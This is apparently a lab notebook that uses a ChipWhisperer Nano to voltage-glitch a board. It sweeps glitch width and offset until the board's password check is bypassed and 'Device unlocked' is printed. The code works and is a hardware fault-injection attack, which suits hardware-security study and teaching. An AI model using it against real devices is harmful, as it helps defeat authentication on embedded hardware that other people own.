# Voltage glitch exploit

Before perfoming a voltage attack, the attacker must discover the parameters that increase their success probability.

First, we need to initialize the chipwhisper nano that will be responsible for reseting the board whenever it is necessary and the serial connection.

In [ ]:
import chipwhisperer as cw
import time 

try:
    if not scope.connectStatus:
        scope.con()
except NameError:
    scope = cw.scope()

scope.default_setup()

# Initialize the FT232H
import serial
ser = serial.Serial('/dev/ttyUSB1',baudrate=115200)

# Function to reset the board
def reset_board():
    #Toggle reset
    ser.reset_input_buffer()
    scope.io.nrst = False
    time.sleep(0.05)
    scope.io.nrst = None #Pulls high by default
    time.sleep(0.05)

If during the test we remove and reconect the chipwhisper to the computer, we should run the following cell that will reconnect it.

In [ ]:
scope.dis()
scope.con()
scope

The following code will attempt different glitch widths and identify the ones that are able to glitch the device.

In [ ]:
from tqdm.notebook import trange

gc = cw.GlitchController(groups=["success", "reset", "normal"], parameters=["width","offset"])
gc.display_stats()

g_step = 1
gc.set_global_step(g_step)
gc.set_range("width", 6, 8)
gc.set_range("offset", 0, 4)

scope.vglitch_setup()
scope.glitch.repeat = 0
scope.glitch.ext_offset = 0

for glitch_setting in gc.glitch_values():
    scope.glitch.repeat = glitch_setting[0]
    scope.glitch.ext_offset = glitch_setting[1]
    successes = 0
    resets = 0
    for i in range(20):
        reset_board()
        time.sleep(0.05)

        buf = ser.read_until(b'Password: ')
        scope.arm()
        time.sleep(1)
        ser.write(b'attempt\n')

        # return True if capture timed out, false if it didn’t.
        if scope.capture():
            print("Capture failed!")
        else:
            time.sleep(0.05)
            while True:
                buf = ser.readline()
                #print(buf.decode())
                if b'Incorrect' in buf:
                    gc.add("normal")
                    break
                elif b'Correct' in buf:
                    print("Glitch!!")
                    gc.add("success")
                    successes += 1
                    break
                elif b'Password:' in buf:
                    #print("Reset")
                    gc.add("reset")
                    resets += 1
                    break
        if successes > 0:
            print("Device unlocked")
            break
    
    if successes > 0:
        break

print("Done glitching")